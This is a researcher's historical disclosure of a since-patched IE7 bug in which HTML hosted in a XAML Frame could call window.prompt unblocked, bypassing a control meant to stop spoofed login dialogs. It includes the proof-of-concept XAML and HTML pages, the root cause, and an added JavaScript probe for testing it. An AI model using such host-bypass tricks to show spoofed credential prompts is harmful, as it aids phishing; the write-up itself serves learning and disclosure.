IE7 introduced a security enhancement that blocks window.prompt in the Internet Zone and shows the gold Information Bar instead, specifically to stop phishing sites from mimicking login dialogs. While checking whether HTML pages hosted inside XAML Frames were subject to the same restriction, I found that calling prompt() from an HTML page loaded inside a XAML <Frame> element worked without restriction: no gold bar, no blocking. I will say that I never personally considered prompt to be a serious security concern, but a bypass of a deliberately added security control is worth documenting.
<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
WindowTitle="xamlFrameClipboardRead">
<TextBlock HorizontalAlignment="Center" VerticalAlignment="Top">
<Bold>This is a XAML Frame:</Bold>
<LineBreak /><LineBreak /><LineBreak />
<Frame Width="700" Height="600" Source="domain1.html" />
<LineBreak /><LineBreak />
<Frame Width="700" Height="600" Source="prompt.html" />
</TextBlock>
</Page>
prompt.html (the HTML page loaded inside the XAML Frame):
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XAML_promptGoldBarBypass</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>XAML_promptGoldBarBypass</h2>
</center>
<hr />
<br />
According to the <a href="http://msdn2.microsoft.com/en-us/ie/aa740486.aspx">IE7 Release Notes WebPage</a>:<br /><br />
<em>Generic Spoofing Risk Reduction in Internet Explorer 7--The window.prompt script method is blocked and the gold Information bar is displayed by default in Internet Zone for Internet Explorer 7.
This helps prevent websites from spoofing things such as the logon screens of other websites. This is a new security enhancement for Internet Explorer 7.</em><br /><br />
However, doing a prompt from inside a XAML-framed HTML page is still possible, with no tricks at all...
<hr />
I know this is a bug... but in my opinion, the prompt was never an issue.
<script language="JavaScript">
prompt("What's your Name?","I'm Mr. Prompt bypassed.");
</script>
</body>
</html>
The IE7 window.prompt restriction was implemented in the standard HTML rendering engine's script host. HTML content loaded through a XAML Frame was hosted by a different layer that did not apply the Internet Zone restrictions, so the prompt() call went through unchecked. The result was that the gold bar feature, intended to stop spoofed login dialogs, could be bypassed simply by wrapping the page in a XAML Frame; no script trickery was needed, and the same HTML that raised the gold bar when loaded directly showed a dialog when framed. The fix required that the XAML Frame host apply the same zone-based script restrictions as the HTML renderer. The general lesson is that a security check enforced in one host of a content type is only as good as its weakest alternate host: every path that can execute the same script must enforce the same policy.
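The way to confirm a bug of this class is to load the same HTML in both hosts and compare what prompt() actually does. The following probe is an added example, not part of the original test pages: it records the hosting context (top-level or framed) and the outcome of a prompt() call, and the prompt implementation is injected so the logic can be exercised offline with stand-ins. The helper names (probePrompt, describeContext, formatReport, hostsAgree) and the three outcome labels are my own; the script is written in ES3 syntax so it also runs in IE7-era script hosts.

```javascript
// Added example (not from the original test page): probe how window.prompt
// behaves in the hosting context this HTML is loaded into. Load the same page
// top-level in the Internet Zone and inside a XAML <Frame>, then compare the
// two reports. ES3 syntax on purpose so it runs in IE7 as well as in Node.

function describeContext(win) {
  // A page is "framed" when it is not the top-level browsing context. A
  // cross-origin parent makes win.top throw on access; treat that as framed.
  var framed;
  try {
    framed = win.top !== win.self;
  } catch (e) {
    framed = true;
  }
  var href = (win.location && win.location.href) ? win.location.href : "";
  return { framed: framed, href: href };
}

function probePrompt(promptFn, win) {
  // Outcome labels (assumed for this example):
  //   "shown" - a dialog was displayed and the user typed a string
  //   "null"  - the call returned null (dialog cancelled, or suppressed by the host)
  //   "threw" - the host rejected the call with an exception
  var report = { context: describeContext(win), outcome: "", value: null };
  try {
    var v = promptFn("Probe: what is your name?", "default text");
    if (typeof v === "string") {
      report.outcome = "shown";
      report.value = v;
    } else {
      report.outcome = "null";
    }
  } catch (e) {
    report.outcome = "threw";
    report.value = String(e && e.message ? e.message : e);
  }
  return report;
}

function formatReport(r) {
  return (r.context.framed ? "framed" : "top-level") + " " + r.context.href +
    " -> prompt " + r.outcome + (r.value !== null ? " (" + r.value + ")" : "");
}

// Two hosts that enforce the same policy must produce the same outcome for the
// same page; a mismatch is exactly the host-inconsistency bug described above.
function hostsAgree(a, b) {
  return a.outcome === b.outcome;
}

// In a browser, run the probe against the real window.prompt and append the
// report to the document (place this script at the end of <body>).
if (typeof window !== "undefined" && typeof document !== "undefined") {
  var live = probePrompt(function (msg, def) { return window.prompt(msg, def); }, window);
  var pre = document.createElement("pre");
  pre.appendChild(document.createTextNode(formatReport(live)));
  document.body.appendChild(pre);
}
```

Save the script into a copy of prompt.html, load that copy directly and through the XAML Frame, and read the two <pre> lines; the original bug shows up as "shown" in the framed copy against "null" or "threw" in the top-level copy.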
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.